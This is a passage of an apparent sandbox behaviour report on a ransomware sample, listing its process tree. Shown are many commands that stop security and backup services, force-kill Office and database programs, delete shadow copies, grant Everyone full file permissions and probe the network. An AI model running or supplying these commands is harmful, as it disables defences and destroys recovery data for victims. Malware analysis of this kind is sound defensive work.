- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:1836
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:4536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:8152
- C:\Windows\system32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:4528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:6840
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:4516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:1012
- C:\Windows\system32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:4508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:6636
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:4500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:8144
- C:\Windows\system32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:4492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:6268
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:5460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    3⤵
    PID:6828
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:1740
- C:\Windows\system32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:5348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:1792
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:5340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:2204
- C:\Windows\system32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:5332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:7404
- C:\Windows\system32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:5324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:5648
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4732
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:5308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6444
- C:\Windows\system32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:4692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vapiendpoint /y
    3⤵
    PID:6204
- C:\Windows\system32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:4032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    3⤵
    PID:7416
- C:\Windows\system32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:2296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:3360
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:3900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:7324
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:4256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:6856
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:4328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:2572
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:4356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:1316
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:3592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:7992
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:2276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:2960
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:1624
- C:\Windows\system32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:4272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:5636
- C:\Windows\system32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:3340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:2412
- C:\Windows\system32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:5116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:6728
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:5108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5304
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:7752
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  PID:5744
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  PID:5752
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  PID:5916
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  PID:6008
- C:\Windows\system32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6028
- C:\Windows\system32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6048
- C:\Windows\system32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6056
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  PID:6000
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  PID:5992
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  PID:5984
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  PID:5976
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  PID:5968
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  PID:5960
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  PID:5952
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  PID:5944
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:5936
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:5928
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  PID:5900
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:5892
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  PID:5884
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  PID:5876
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  PID:5868
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  PID:5860
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  PID:5852
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  PID:5844
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  PID:5836
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:5828
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  PID:5820
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:5812
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  PID:5804
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  PID:5796
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:5788
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  PID:5780
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  PID:5772
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  PID:5764
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  PID:5736
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:5728
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  PID:5720
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  PID:5712
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  PID:5704
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:5696
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  PID:5688
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  PID:5680
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:5672
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  PID:5664
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5656
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  PID:5648
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5640
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:5632
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:5624
- C:\Windows\system32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:5616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:7888
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:5608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:7332
- C:\Windows\system32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:5592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:8000
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:5584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:8068
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:7456
- C:\Windows\system32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:5568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:6092
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:5560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:7984
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:8052
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:5096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:6748
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:5084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:7304
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:5076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:6556
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:5068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:2344
- C:\Windows\system32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:5060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:5912
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:7672
- C:\Windows\system32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:5044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:8044
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:5036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:700
- C:\Windows\system32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:5028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:5320
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:5020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:7880
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:5008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:1644
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:5000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:7296
- C:\Windows\system32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:4988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:2664
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:4972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:5252
- C:\Windows\system32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:4960
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:3384
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:7288
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:4928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:7728
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:4484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:6928
- C:\Windows\system32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:4476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:1636
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:4464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:8128
- C:\Windows\system32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:4452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:2188
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:4440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:8160
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:4424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:2456
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:4416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:7028
- C:\Windows\system32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:4392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sms_site_sql_backup /y
    3⤵
    PID:8036
- C:\Windows\system32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:4372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:1572
- C:\Windows\system32\net.exe
  "net.exe" use \\10.7.0.38
  2⤵
  PID:6428
- C:\Windows\system32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:4292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:1048
- C:\Windows\system32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:4260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:2796
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:4236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:4320
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:4228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:7412
- C:\Windows\system32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:4220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:7920
- C:\Windows\system32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:4212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:5844
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:4204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:4720
- C:\Windows\system32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:4196
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:6796
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:4188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:7704
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:4180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:2412
- C:\Windows\system32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:4168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:8116
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:4160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:6188
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:4152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3120
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:4144
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:2024
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:4136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:8016
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:4128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:7036
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:4120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:7712
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:4112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:3436
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:4100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:8100
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:2688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:8076
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:1496
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:4064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:1672
- C:\Windows\system32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:4044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:3568
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:3308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:8092
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:1612
- C:\Windows\system32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:3132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:7968
- C:\Windows\system32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:3736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:7800
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:3356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:3884
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:7720
- C:\Windows\system32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:3600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:5140
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:7252
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:2248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:8108
- C:\Windows\system32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:2908
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:7928
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:2912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:1484
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:3096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:7936
- C:\Windows\system32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:3484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:2552
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:6532
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:3332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:7808
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:2656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:8168
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:1348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:7944
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:3224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:6136
- C:\Windows\system32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:1840
- - C:\Windows\system32\net1.exe
